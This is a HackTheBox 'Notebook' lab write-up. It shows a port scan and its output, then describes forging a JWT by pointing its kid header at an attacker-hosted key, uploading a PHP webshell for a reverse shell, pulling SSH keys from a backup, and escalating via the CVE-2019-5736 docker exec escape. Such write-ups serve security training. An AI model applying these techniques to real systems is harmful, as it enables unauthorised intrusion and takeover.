Hello everyone , in this post I will be sharing my writeup for HTB Notebook machine which is a medium linux box having 2 ports open http and ssh. On the web server we would see an application which involved having to register on the application. After signing up we can see that the application uses JWT for authentication so after analyzing the JWT cookie we can see that it’s grabbing the kid Key ID from the localhost , so we can change it by generating our pair of key and adding our IP address so it reaches on our machine to grab the key when it tries to authenticate a user . After getting to admin on the application we can some notes telling about backups also we can upload files and usually we would go for php reverse shell so I used phpbash to get a web interactive shell and then through that got a reverse shell. From the notes we can get to the directory where we can find ssh key for user and then doing sudo -l we can see what the user can run which turns out to be a docker CVE through which can get root on the host machine.
Rustscan
rustscan -a 10.129.84.245 -- -A -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.84.245:22
Open 10.129.84.245:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZwjrB05nGUvacI81YxNqy+6WpPHhIju6c73aoiru9nW/aVhTmOEsSOGoChEXeQeDN67ZN5QW4LFf0tXeQeJqvgO82HtFkUOiN8tt1RpI98S
V+hx8scCzpmtAyu1OJSUM3/cL2tEPTcPHAgHTmroWiXxIMPhTFLIoDVBIqmBrORUIwgjIzFUbEDQJXKPkFciofbowVOkHnT+lv5XokU6571wrX/LRJvTNBEAvbbz0HAfvUkne8ycQsW08qk/Bugi
LnJHLg24YryGdHl5RqqW/42fsUADngFLncy2+/XCo8Pe/erO+7Zw6r4n1qVb0W0BZ+lRflcRss3diM/21R6O0z
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLeuBF/ZBUM0ZBYW4+vgQMhIPWVs2fzv9lmQHoflWFNMP/sFWZDeVneJE0CRSLnYi2y/wwc079
bIsQRibay3Fpg=
| 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDg0mzA1xTe9hivlJN4s+7eXaiyIYefpyykHIir3btEA
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: B2F904D3046B07D05F90FB6131602ED2
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note KeeperPORT 80 (HTTP)
I went to login page and tried basic sqli
Tried admin:admin
And got this error so we know that admin user exists
Then I decide to register an account
After registering an account I tried to to do some stuff with HTML but saw couldn’t do anything
On running dirsearch I didn't found anything
So I decided to intercept the request with burp suite and found a base64 encoded cookie
Which I then took it to cyberchef
Alternatively it is best to vist https://jwt.io
Now we want to create our own key and host it on port 7070
https://gist.github.com/ygotthilf/baa58da5c3dd1f69fae9
Notice we have two keys public and private we want the public to be hosted and rename it to privKey.key
Notice we have added admin_cap =true and changed the kid to our machine ,now copy the whole encoded text and replace it with the cookie and notice that we will see admin panel in the navigation bar.
I decide to upload phpbash.php which give us a nice sessions on the web browser
Running linpeas we can see that there’s docker installed on the box
We can also see IPTABLES have docker rules configured
I tried connecting to docker with docker -H 127.0.0.1:10101, 127.0.0.1:8080 but was doing it wrong maybe
Going back to the website as admin I saw some notes which I was able to view
Here Noah says that he has some files in backups
We can see home.tar.gz
I started a python server on target machine and transfer that gz archive
So we have ssh keys for user noah
This * will accept any argument so let's see if we can run commands on the container
Apparently there’s a CVE for docker exec
https://github.com/Frichetten/CVE-2019-5736-PoC
Download the golang file and compile it on your machine
Set SUID on bash in payload
Then compile the golang source code with go build docker.go transfer that binary to docker container execute it and in the same time execute sh on docker
Or if we simply want a reverse shell we could use a bash reverse shell payload instead of making /bin/bash a SUID
